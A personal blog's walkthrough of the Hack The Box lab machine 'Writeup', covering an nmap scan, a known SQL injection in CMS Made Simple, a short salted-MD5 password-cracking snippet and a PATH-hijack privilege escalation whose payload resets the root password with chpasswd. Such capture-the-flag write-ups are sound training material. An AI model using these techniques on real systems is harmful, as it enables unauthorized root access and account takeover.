Sarthak Saini

Welcome to my Personal Blog.

Home About me

Writeup (HACK THE BOX)

Hey guys today we will be doing Writeup from HackTheBox :)

Nmap Scan

[sarthak@sarthak ~]$ nmap -sV -v -Pn
Starting Nmap 7.70 ( ) at 2019-06-13 07:07 IST
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 07:07
Completed Parallel DNS resolution of 1 host. at 07:07, 0.01s elapsed
Initiating Connect Scan at 07:07
Scanning [1000 ports]
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Completed Connect Scan at 07:07, 23.64s elapsed (1000 total ports)
Initiating Service scan at 07:07
Scanning 2 services on
Completed Service scan at 07:08, 6.72s elapsed (2 services on 1 host)
NSE: Script scanning
Initiating NSE at 07:08
Completed NSE at 07:08, 1.27s elapsed
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Nmap scan report for
Host is up (0.31s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 33.08 seconds

Two services are running ..let’s enumerate apache(port 80)

Enumerating Web Server

According to the message we can see there’s a dos protection waf is working which will an every ip which triggers 40x apache codes…

So rather than using dirb,gobuster,etc …we will use burp to spider the domain ..

Now we got a new directory named ‘writeup’ and i am using a really awesome extension named ‘wappalyzer’ which helped me to find that this directory has cms made simple installed…

Now i found a blind time based sql injection whose exploit code is available

python2 -u

I extracted the decrypt logic from the exploit and saw that before converting to md5 we have to concat it with salt so the final exploit code i created for finding password is

import hashlib

def crack_password():
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line


The password extracted from the wordlist was raykayjay9

Logging into ssh

So now we have credentials


Downloading pspy64 to snoop on processes

Now if a user logged in by ssh we will see some commands being executed in the server which can be seen by pspy64 binary output

The command was …

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/

if we break this command into chunks and try to understand what it’s doing is setting up the PATH variable in which we can see /usr/local/sbin was at top which means it will be given highest priority while looking for any binary by the operating system so…

run-parts --lsbsysinit /etc/update-motd.d > /run/

we can see run-parts is being executed and if we check the permissions of /usr/local/sbin we will notice that..

our user is in the same group as of /usr/local/sbin so that means we can write stuff inside the sbin folder, So we will write a binary in /tmp folder with our malicious payload and give it permissions to execute and will copy it to the sbin folder…
The payload will be..

echo "root:pwned@123"|chpasswd

This will change the password of root to pwned@123 so let’s try this…

Now we have copied the payload let’s quickly log out and login back to ssh and test the credentials…

And we rooted this box …interesting machine it was,

If you guys liked this writeup of writeup lol stay tuned :)